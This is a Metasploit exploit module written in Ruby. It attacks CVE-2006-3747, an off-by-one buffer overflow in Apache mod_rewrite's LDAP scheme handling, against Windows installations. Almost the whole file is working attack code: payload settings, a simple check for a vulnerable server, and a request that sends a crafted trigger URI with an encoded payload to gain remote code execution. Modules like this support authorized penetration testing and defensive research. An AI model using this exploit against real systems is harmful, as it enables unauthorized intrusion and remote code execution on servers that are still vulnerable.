Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits the mod_rewrite LDAP protocol scheme handling
16
        flaw discovered by Mark Dowd, which produces an off-by-one overflow.
17
        Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
18
        This module requires REWRITEPATH to be set accurately. In addition,
19
        the target must have 'RewriteEngine on' configured, with a specific
20
        'RewriteRule' condition enabled to allow for exploitation.
21

22
        The flaw affects multiple platforms, however this module currently
23
        only supports Windows based installations.
24
      },
25
      'Author'         => 'aushack',
26
      'References'     =>
27
        [
28
          [ 'CVE', '2006-3747' ],
29
          [ 'OSVDB', '27588' ],
30
          [ 'BID', '19204' ],
31
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
32
          [ 'EDB', '3680' ],
33
          [ 'EDB', '3996' ],
34
          [ 'EDB', '2237' ]
35
        ],
36
      'DefaultOptions' =>
37
        {
38
          'EXITFUNC' => 'thread',
39
          'AllowWin32SEH' => true
40
        },
41
      'Privileged'     => true,
42
      'Platform'       => ['win'],
43
      'Payload'        =>
44
        {
45
          'Space'    => 636,
46
          'BadChars' => "\x00\x0a\x0d\x20",
47
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
48
          'StackAdjustment' => -3500,
49
          'DisableNops'  =>  'True',
50
        },
51
      'Targets'        =>
52
        [
53
          [  'Automatic', {} ], # aushack tested OK 20090310 win32
54
        ],
55
      'DisclosureDate' => '2006-07-28',
56
      'DefaultTarget'  => 0))
57

58
      register_options(
59
        [
60
          OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
61
        ])
62
  end
63

64

65
  def check
66
    res = send_request_raw({
67
      'uri'     => '/',
68
      'version' => '1.1',
69
    }, 2)
70

71
    if (res.to_s =~ /Apache/) # This could be smarter.
72
      return Exploit::CheckCode::Detected
73
    end
74
    return Exploit::CheckCode::Safe
75

76
  end
77

78
  def exploit
79

80
    # On Linux Apache, it is possible to overwrite EIP by
81
    # sending ldap://<buf> ... TODO aushack
82

83
    trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
84

85
    print_status("Sending payload.")
86
    send_request_raw({
87
        'uri'     => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
88
        'version' => '1.0',
89
        }, 2)
90
    handler
91
  end
92
end
93

94